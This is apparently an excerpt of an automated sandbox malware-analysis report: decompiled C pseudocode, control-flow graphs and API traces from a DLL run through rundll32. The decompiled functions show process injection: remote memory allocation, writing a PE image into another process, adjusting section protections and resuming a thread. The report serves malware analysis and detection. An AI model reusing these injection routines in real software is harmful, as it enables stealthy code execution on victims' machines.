                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2518216231-0
                                                                                                                                                                          • Opcode ID: 9acbeec960e4eee4feb4ae2fd037e30788636bba3a67935c8320dabe02241bd7
                                                                                                                                                                          • Instruction ID: 36a9b33bf08feeffb89c0f046acd7b405da6ef9df32260d613b3c798c1d25f8e
                                                                                                                                                                          • Opcode Fuzzy Hash: 9acbeec960e4eee4feb4ae2fd037e30788636bba3a67935c8320dabe02241bd7
                                                                                                                                                                          • Instruction Fuzzy Hash: 1421F8336043056FE310DF64DC45E9A7BD9EF893A0F24052AF554C75D6EA30D909C7A5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 214 100144d8-100144e6 215 100144f0-1001451b 214->215 216 100144e8-100144eb 214->216 218 1001451f-10014521 215->218 217 10014728-10014729 216->217 219 10014523 218->219 220 10014525-1001455f NtProtectVirtualMemory 218->220 219->218 221 10014561-10014563 220->221 222 1001456f-10014573 220->222 224 10014565 221->224 225 10014567-1001456a 221->225 223 1001457c-10014586 222->223 226 10014726 223->226 227 1001458c-10014598 223->227 224->221 225->217 226->217 228 1001459a 227->228 229 1001459c-100145f7 call 1000936a call 100092ca 227->229 228->223 235 100145f9-10014600 229->235 236 10014648-1001464f 229->236 238 10014602-10014609 235->238 239 10014654-10014669 235->239 237 100146de-100146e0 236->237 244 100146e2 237->244 245 100146e4-10014711 NtProtectVirtualMemory 237->245 242 100146b3-100146ba 238->242 243 1001460f-10014616 238->243 240 100146b1 239->240 241 1001466b-10014678 239->241 240->237 241->240 248 1001467a-10014688 241->248 242->237 249 100146bc-100146c3 243->249 250 1001461c-10014623 243->250 244->237 246 10014713-10014715 245->246 247 1001471b-1001471d 245->247 251 10014717 246->251 252 10014719 246->252 253 10014721 247->253 254 1001471f 247->254 248->240 255 1001468a-10014698 248->255 249->237 256 100146c5-100146cc 250->256 257 10014629-10014630 250->257 251->246 252->253 253->226 254->247 255->240 258 1001469a-100146a8 255->258 256->237 259 10014636-1001463d 257->259 260 100146ce-100146d5 257->260 258->240 263 100146aa 258->263 261 10014643 259->261 262 100146d7 259->262 260->237 261->237 262->237 263->240
                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                          			E100144D8(signed int __eax, void* _a4, void* _a8, intOrPtr _a12, void* _a16) {
                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                          				long _v24;
                                                                                                                                                                          				long _v28;
                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                          				long _v36;
                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                          				long _v44;
                                                                                                                                                                          				void* _v48;
                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                          				signed int _v56;
                                                                                                                                                                          				void* _v60;
                                                                                                                                                                          				signed int _v64;
                                                                                                                                                                          				char _v76;
                                                                                                                                                                          				void* _t180;
                                                                                                                                                                          				void* _t181;
                                                                                                                                                                          
                                                                                                                                                                          				_v64 = _v64 & 0x00000000;
                                                                                                                                                                          				if(_a12 == 0) {
                                                                                                                                                                          					return __eax | 0xffffffff;
                                                                                                                                                                          				}
                                                                                                                                                                          				_v32 = _a12;
                                                                                                                                                                          				_v40 =  *((intOrPtr*)(_a12 + 0x3c)) + _a12;
                                                                                                                                                                          				_v52 = _v40;
                                                                                                                                                                          				_t16 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8; // 0xf8
                                                                                                                                                                          				_v20 = _a12 + _t16;
                                                                                                                                                                          				_v36 = _v36 & 0x00000000;
                                                                                                                                                                          				do {
                                                                                                                                                                          				} while (0 != 0);
                                                                                                                                                                          				_v44 = 4;
                                                                                                                                                                          				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8;
                                                                                                                                                                          				_v48 = _a16;
                                                                                                                                                                          				_v28 = NtProtectVirtualMemory(_a8,  &_v48,  &_v24, _v44,  &_v36);
                                                                                                                                                                          				if(_v28 >= 0) {
                                                                                                                                                                          					_v12 = _v12 & 0x00000000;
                                                                                                                                                                          					while(_v12 < ( *(_v52 + 6) & 0x0000ffff)) {
                                                                                                                                                                          						if( *((intOrPtr*)(_v20 + 0x14 + _v12 * 0x28)) != 0) {
                                                                                                                                                                          							E1000936A( &_v76, 0, 9);
                                                                                                                                                                          							E100092CA( &_v76, _v12 * 0x28 + _v20, 8);
                                                                                                                                                                          							_t181 = _t181 + 0x18;
                                                                                                                                                                          							_v60 = _a16 +  *((intOrPtr*)(_v20 + 0xc + _v12 * 0x28));
                                                                                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                                                                                          							_v56 =  *(_v20 + 0x24 + _v12 * 0x28) & 0xf0000000;
                                                                                                                                                                          							_v16 = _v56;
                                                                                                                                                                          							if(_v16 == 0x20000000) {
                                                                                                                                                                          								_v8 = 0x10;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								if(_v16 == 0x40000000) {
                                                                                                                                                                          									_v8 = 2;
                                                                                                                                                                          									if( *((char*)(_t180 + 0xbadb65)) == 0x72 &&  *((char*)(_t180 + 0xbadb65)) == 0x64 &&  *((char*)(_t180 + 0xffffffffffffffbb)) == 0x61 &&  *((char*)(_t180 + 0xbadb65)) == 0x74 &&  *((char*)(_t180 + 0xffffffffffffffbd)) == 0x61) {
                                                                                                                                                                          										_v8 = 4;
                                                                                                                                                                          									}
                                                                                                                                                                          								} else {
                                                                                                                                                                          									if(_v16 == 0x60000000) {
                                                                                                                                                                          										_v8 = 0x20;
                                                                                                                                                                          									} else {
                                                                                                                                                                          										if(_v16 == 0x80000000) {
                                                                                                                                                                          											_v8 = 4;
                                                                                                                                                                          										} else {
                                                                                                                                                                          											if(_v16 == 0xa0000000) {
                                                                                                                                                                          												_v8 = 0x40;
                                                                                                                                                                          											} else {
                                                                                                                                                                          												if(_v16 == 0xc0000000) {
                                                                                                                                                                          													_v8 = 4;
                                                                                                                                                                          												} else {
                                                                                                                                                                          													if(_v16 == 0xe0000000) {
                                                                                                                                                                          														_v8 = 0x40;
                                                                                                                                                                          													}
                                                                                                                                                                          												}
                                                                                                                                                                          											}
                                                                                                                                                                          										}
                                                                                                                                                                          									}
                                                                                                                                                                          								}
                                                                                                                                                                          							}
                                                                                                                                                                          							while(0 != 0) {
                                                                                                                                                                          							}
                                                                                                                                                                          							_v24 =  *((intOrPtr*)(_v20 + 0x10 + _v12 * 0x28));
                                                                                                                                                                          							_v28 = NtProtectVirtualMemory(_a8,  &_v60,  &_v24, _v8,  &_v36);
                                                                                                                                                                          							if(_v28 >= 0) {
                                                                                                                                                                          								while(0 != 0) {
                                                                                                                                                                          								}
                                                                                                                                                                          								L43:
                                                                                                                                                                          								L10:
                                                                                                                                                                          								_v12 = _v12 + 1;
                                                                                                                                                                          								continue;
                                                                                                                                                                          							}
                                                                                                                                                                          							while(0 != 0) {
                                                                                                                                                                          							}
                                                                                                                                                                          							goto L43;
                                                                                                                                                                          						}
                                                                                                                                                                          						goto L10;
                                                                                                                                                                          					}
                                                                                                                                                                          					return 0;
                                                                                                                                                                          				}
                                                                                                                                                                          				L6:
                                                                                                                                                                          				if(0 == 0) {
                                                                                                                                                                          					return 0xffffffff;
                                                                                                                                                                          				} else {
                                                                                                                                                                          				}
                                                                                                                                                                          				goto L6;
                                                                                                                                                                          			}





















                                                                                                                                                                          0x100144de
                                                                                                                                                                          0x100144e6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100144e8
                                                                                                                                                                          0x100144f3
                                                                                                                                                                          0x100144ff
                                                                                                                                                                          0x10014505
                                                                                                                                                                          0x10014511
                                                                                                                                                                          0x10014518
                                                                                                                                                                          0x1001451b
                                                                                                                                                                          0x1001451f
                                                                                                                                                                          0x1001451f
                                                                                                                                                                          0x10014525
                                                                                                                                                                          0x10014537
                                                                                                                                                                          0x1001453d
                                                                                                                                                                          0x10014558
                                                                                                                                                                          0x1001455f
                                                                                                                                                                          0x1001456f
                                                                                                                                                                          0x1001457c
                                                                                                                                                                          0x10014598
                                                                                                                                                                          0x100145a4
                                                                                                                                                                          0x100145ba
                                                                                                                                                                          0x100145bf
                                                                                                                                                                          0x100145d0
                                                                                                                                                                          0x100145d3
                                                                                                                                                                          0x100145e7
                                                                                                                                                                          0x100145ed
                                                                                                                                                                          0x100145f7
                                                                                                                                                                          0x10014648
                                                                                                                                                                          0x100145f9
                                                                                                                                                                          0x10014600
                                                                                                                                                                          0x10014654
                                                                                                                                                                          0x10014669
                                                                                                                                                                          0x100146aa
                                                                                                                                                                          0x100146aa
                                                                                                                                                                          0x10014602
                                                                                                                                                                          0x10014609
                                                                                                                                                                          0x100146b3
                                                                                                                                                                          0x1001460f
                                                                                                                                                                          0x10014616
                                                                                                                                                                          0x100146bc
                                                                                                                                                                          0x1001461c
                                                                                                                                                                          0x10014623
                                                                                                                                                                          0x100146c5
                                                                                                                                                                          0x10014629
                                                                                                                                                                          0x10014630
                                                                                                                                                                          0x100146ce
                                                                                                                                                                          0x10014636
                                                                                                                                                                          0x1001463d
                                                                                                                                                                          0x100146d7
                                                                                                                                                                          0x100146d7
                                                                                                                                                                          0x1001463d
                                                                                                                                                                          0x10014630
                                                                                                                                                                          0x10014623
                                                                                                                                                                          0x10014616
                                                                                                                                                                          0x10014609
                                                                                                                                                                          0x10014600
                                                                                                                                                                          0x100146de
                                                                                                                                                                          0x100146e2
                                                                                                                                                                          0x100146ef
                                                                                                                                                                          0x1001470a
                                                                                                                                                                          0x10014711
                                                                                                                                                                          0x1001471b
                                                                                                                                                                          0x1001471f
                                                                                                                                                                          0x10014721
                                                                                                                                                                          0x10014575
                                                                                                                                                                          0x10014579
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014579
                                                                                                                                                                          0x10014713
                                                                                                                                                                          0x10014717
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014719
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001459a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014726
                                                                                                                                                                          0x10014561
                                                                                                                                                                          0x10014563
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10014565
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(100043D8,?,?,00000004,00000000), ref: 10014555
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 2706961497-2766056989
                                                                                                                                                                          • Opcode ID: f29c8957ecab033f66468f640b79c4768bb0c25ba70d7dfc5b456a8dc6320b4f
                                                                                                                                                                          • Instruction ID: 8c9ccfd38e53d97595bd4f830bc44a0b9f9517175c763c98dc2f2187c2248c51
                                                                                                                                                                          • Opcode Fuzzy Hash: f29c8957ecab033f66468f640b79c4768bb0c25ba70d7dfc5b456a8dc6320b4f
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A713A70D04209DFDB50CFA4C980BEEBBF4EB05359F228566E811EA2A1DB74DA91DF11
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 308 1000caf3-1000cb26 NtAllocateVirtualMemory 309 1000cb71 308->309 310 1000cb28-1000cb39 NtWriteVirtualMemory 308->310 313 1000cb73-1000cb77 309->313 311 1000cb5a-1000cb5e 310->311 312 1000cb3b-1000cb53 NtProtectVirtualMemory 310->312 311->309 315 1000cb60-1000cb6d 311->315 312->311 314 1000cb55-1000cb58 312->314 314->313 315->309
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1000CAF3(void* __ecx, void* __edx, void* _a4, long _a8, long _a12) {
                                                                                                                                                                          				void* _v8;
                                                                                                                                                                          				long _v12;
                                                                                                                                                                          				long _v16;
                                                                                                                                                                          				long _t25;
                                                                                                                                                                          				long _t37;
                                                                                                                                                                          				void* _t41;
                                                                                                                                                                          				void* _t42;
                                                                                                                                                                          
                                                                                                                                                                          				_t37 = _a8;
                                                                                                                                                                          				_t41 = __ecx;
                                                                                                                                                                          				_a8 = _t37;
                                                                                                                                                                          				_t42 = __edx;
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                          				_t25 = NtAllocateVirtualMemory(__edx,  &_v8, 0,  &_a8, 0x3000, 4); // executed
                                                                                                                                                                          				if(_t25 < 0) {
                                                                                                                                                                          					L6:
                                                                                                                                                                          					return 0;
                                                                                                                                                                          				}
                                                                                                                                                                          				if(NtWriteVirtualMemory(_t42, _v8, _a4, _t37,  &_v12) < 0) {
                                                                                                                                                                          					L4:
                                                                                                                                                                          					if(_v8 != 0) {
                                                                                                                                                                          						 *((intOrPtr*)(_t41 + 4))(_t42,  &_v8,  &_a8, 0x8000);
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L6;
                                                                                                                                                                          				}
                                                                                                                                                                          				_a8 = _t37;
                                                                                                                                                                          				if(NtProtectVirtualMemory(_t42,  &_v8,  &_a8, _a12,  &_v16) < 0) {
                                                                                                                                                                          					goto L4;
                                                                                                                                                                          				}
                                                                                                                                                                          				return _v8;
                                                                                                                                                                          			}










                                                                                                                                                                          0x1000cafa
                                                                                                                                                                          0x1000cb0a
                                                                                                                                                                          0x1000cb0c
                                                                                                                                                                          0x1000cb15
                                                                                                                                                                          0x1000cb17
                                                                                                                                                                          0x1000cb1c
                                                                                                                                                                          0x1000cb1f
                                                                                                                                                                          0x1000cb22
                                                                                                                                                                          0x1000cb26
                                                                                                                                                                          0x1000cb71
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000cb71
                                                                                                                                                                          0x1000cb39
                                                                                                                                                                          0x1000cb5a
                                                                                                                                                                          0x1000cb5e
                                                                                                                                                                          0x1000cb6e
                                                                                                                                                                          0x1000cb6e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000cb5e
                                                                                                                                                                          0x1000cb3e
                                                                                                                                                                          0x1000cb53
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB22
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB34
                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB4E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryVirtual$AllocateProtectWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2264391890-0
                                                                                                                                                                          • Opcode ID: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
                                                                                                                                                                          • Instruction ID: 892a4515f77ee017147e8a2b0b2c61a0bf4351e7243d22ba98e9bd68d4923f67
                                                                                                                                                                          • Opcode Fuzzy Hash: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
                                                                                                                                                                          • Instruction Fuzzy Hash: CE11E976A0020DBFEB05CF95C845EDEBBBCEF48354F108166BA19D6140D730DB049BA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                          			E1000AA38(void* __ecx, void* __eflags) {
                                                                                                                                                                          				char _v44;
                                                                                                                                                                          				intOrPtr _t9;
                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                          				void* _t13;
                                                                                                                                                                          				intOrPtr _t17;
                                                                                                                                                                          				void* _t20;
                                                                                                                                                                          				void* _t21;
                                                                                                                                                                          				void* _t28;
                                                                                                                                                                          				void* _t29;
                                                                                                                                                                          				void* _t31;
                                                                                                                                                                          				void* _t32;
                                                                                                                                                                          
                                                                                                                                                                          				_t9 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          				_t1 = _t9 + 0xac; // 0x95fcca22
                                                                                                                                                                          				_t21 = __ecx;
                                                                                                                                                                          				E1000C08F( &_v44,  *_t1 + 7, __eflags);
                                                                                                                                                                          				_t32 = 0;
                                                                                                                                                                          				_t12 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
                                                                                                                                                                          				_t29 = _t13;
                                                                                                                                                                          				if(_t29 != 0) {
                                                                                                                                                                          					GetLastError();
                                                                                                                                                                          					NtResumeThread( *(_t21 + 4), 0);
                                                                                                                                                                          					_t17 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          					_push(0x2710);
                                                                                                                                                                          					_push(_t29);
                                                                                                                                                                          					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
                                                                                                                                                                          						_t32 = 1;
                                                                                                                                                                          					}
                                                                                                                                                                          					FindCloseChangeNotification(_t29);
                                                                                                                                                                          					_t13 = _t32;
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t13;
                                                                                                                                                                          			}














                                                                                                                                                                          0x1000aa3b
                                                                                                                                                                          0x1000aa43
                                                                                                                                                                          0x1000aa4b
                                                                                                                                                                          0x1000aa54
                                                                                                                                                                          0x1000aa5c
                                                                                                                                                                          0x1000aa5f
                                                                                                                                                                          0x1000aa67
                                                                                                                                                                          0x1000aa6d
                                                                                                                                                                          0x1000aa71
                                                                                                                                                                          0x1000aa73
                                                                                                                                                                          0x1000aa82
                                                                                                                                                                          0x1000aa85
                                                                                                                                                                          0x1000aa8a
                                                                                                                                                                          0x1000aa8f
                                                                                                                                                                          0x1000aa95
                                                                                                                                                                          0x1000aa99
                                                                                                                                                                          0x1000aa99
                                                                                                                                                                          0x1000aaa1
                                                                                                                                                                          0x1000aaa4
                                                                                                                                                                          0x1000aaa4
                                                                                                                                                                          0x1000aaaa

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AA73
                                                                                                                                                                          • NtResumeThread.NTDLL(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AA82
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,10004C12), ref: 1000AAA1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ChangeCloseErrorFindLastNotificationResumeThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4135917582-0
                                                                                                                                                                          • Opcode ID: 228c20943cadb0bc02e93a6f657e61c4507d0bad2e13d2432159749fd6f40c79
                                                                                                                                                                          • Instruction ID: ecd51d03452cafcdcdf148b0bc3d5607b702456ca6ceb967f89cd25d37e20497
                                                                                                                                                                          • Opcode Fuzzy Hash: 228c20943cadb0bc02e93a6f657e61c4507d0bad2e13d2432159749fd6f40c79
                                                                                                                                                                          • Instruction Fuzzy Hash: 02012632301120AFD350CBA9CDC8DAB3BF9EF4E6A1B150024FA05D7616C730D802CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                          			E1000A51F(void* __ecx, void* __edx) {
                                                                                                                                                                          				void* _v8;
                                                                                                                                                                          				void* _v12;
                                                                                                                                                                          				long _v16;
                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                          				long _v32;
                                                                                                                                                                          				long _t37;
                                                                                                                                                                          				void* _t38;
                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                          				void* _t46;
                                                                                                                                                                          				void* _t58;
                                                                                                                                                                          				void* _t71;
                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                          
                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                          				_t71 = __edx;
                                                                                                                                                                          				_t58 = __ecx;
                                                                                                                                                                          				_t3 = _t71 + 0x3c; // 0x100
                                                                                                                                                                          				_t73 =  *_t3 + __edx;
                                                                                                                                                                          				if( *_t73 != 0x4550) {
                                                                                                                                                                          					L5:
                                                                                                                                                                          					return 0;
                                                                                                                                                                          				}
                                                                                                                                                                          				_v16 =  *(_t73 + 0x50);
                                                                                                                                                                          				_t37 = NtAllocateVirtualMemory(__ecx,  &_v8, 0,  &_v16, 0x3000, 0x40); // executed
                                                                                                                                                                          				if(_t37 < 0) {
                                                                                                                                                                          					goto L5;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t38 = E10009252( *0x10020fd8, 0x1ac4);
                                                                                                                                                                          				_v12 = _t38;
                                                                                                                                                                          				if(_t38 == 0) {
                                                                                                                                                                          					goto L5;
                                                                                                                                                                          				}
                                                                                                                                                                          				 *((intOrPtr*)(_t38 + 0x224)) = _v8;
                                                                                                                                                                          				_t39 = E1000CAF3( *0x100210b4, _t58, _t38, 0x1ac4, 4); // executed
                                                                                                                                                                          				_v20 = _t39;
                                                                                                                                                                          				_push(0x1ac4);
                                                                                                                                                                          				_push( &_v12);
                                                                                                                                                                          				if(_t39 != 0) {
                                                                                                                                                                          					E10009203();
                                                                                                                                                                          					_t42 =  *0x10020fa8; // 0x10000000
                                                                                                                                                                          					_v24 = _t42;
                                                                                                                                                                          					_t43 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          					_v28 = _t43;
                                                                                                                                                                          					 *0x10020fa8 = _v8;
                                                                                                                                                                          					 *0x10020fd8 = _v20;
                                                                                                                                                                          					_t46 = E10009252(_t71,  *(_t73 + 0x50)); // executed
                                                                                                                                                                          					_v12 = _t46;
                                                                                                                                                                          					if(_t46 == 0) {
                                                                                                                                                                          						goto L5;
                                                                                                                                                                          					}
                                                                                                                                                                          					E1000A49E(_t46, _v8, _t71);
                                                                                                                                                                          					_v32 = _v32 & 0x00000000;
                                                                                                                                                                          					 *0x10020fa8 = _v24;
                                                                                                                                                                          					 *0x10020fd8 = _v28;
                                                                                                                                                                          					if(NtWriteVirtualMemory(_t58, _v8, _v12,  *(_t73 + 0x50),  &_v32) < 0) {
                                                                                                                                                                          						goto L5;
                                                                                                                                                                          					}
                                                                                                                                                                          					E100144D8(_t52,  *0x100210b4, _t58, _t71, _v8); // executed
                                                                                                                                                                          					E10009203( &_v12, 0);
                                                                                                                                                                          					return _v8;
                                                                                                                                                                          				}
                                                                                                                                                                          				E10009203();
                                                                                                                                                                          				goto L5;
                                                                                                                                                                          			}



















                                                                                                                                                                          0x1000a525
                                                                                                                                                                          0x1000a52c
                                                                                                                                                                          0x1000a52e
                                                                                                                                                                          0x1000a530
                                                                                                                                                                          0x1000a533
                                                                                                                                                                          0x1000a53b
                                                                                                                                                                          0x1000a5b1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a5b1
                                                                                                                                                                          0x1000a542
                                                                                                                                                                          0x1000a55a
                                                                                                                                                                          0x1000a55e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a56b
                                                                                                                                                                          0x1000a570
                                                                                                                                                                          0x1000a577
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a580
                                                                                                                                                                          0x1000a592
                                                                                                                                                                          0x1000a59a
                                                                                                                                                                          0x1000a5a2
                                                                                                                                                                          0x1000a5a7
                                                                                                                                                                          0x1000a5a8
                                                                                                                                                                          0x1000a5b8
                                                                                                                                                                          0x1000a5bd
                                                                                                                                                                          0x1000a5c2
                                                                                                                                                                          0x1000a5c5
                                                                                                                                                                          0x1000a5ca
                                                                                                                                                                          0x1000a5d0
                                                                                                                                                                          0x1000a5d8
                                                                                                                                                                          0x1000a5e1
                                                                                                                                                                          0x1000a5e9
                                                                                                                                                                          0x1000a5ee
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a5f6
                                                                                                                                                                          0x1000a5fe
                                                                                                                                                                          0x1000a602
                                                                                                                                                                          0x1000a60b
                                                                                                                                                                          0x1000a628
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a635
                                                                                                                                                                          0x1000a640
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a648
                                                                                                                                                                          0x1000a5aa
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00003000,00000040,?,00000000,100043D8,?,?,?,1000A958,?,00000000), ref: 1000A55A
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00000000), ref: 1000A623
                                                                                                                                                                            • Part of subcall function 1000CAF3: NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB22
                                                                                                                                                                            • Part of subcall function 1000CAF3: NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB34
                                                                                                                                                                            • Part of subcall function 1000CAF3: NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000040), ref: 1000CB4E
                                                                                                                                                                            • Part of subcall function 10009203: HeapFree.KERNEL32(00000000,00000000), ref: 10009249
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
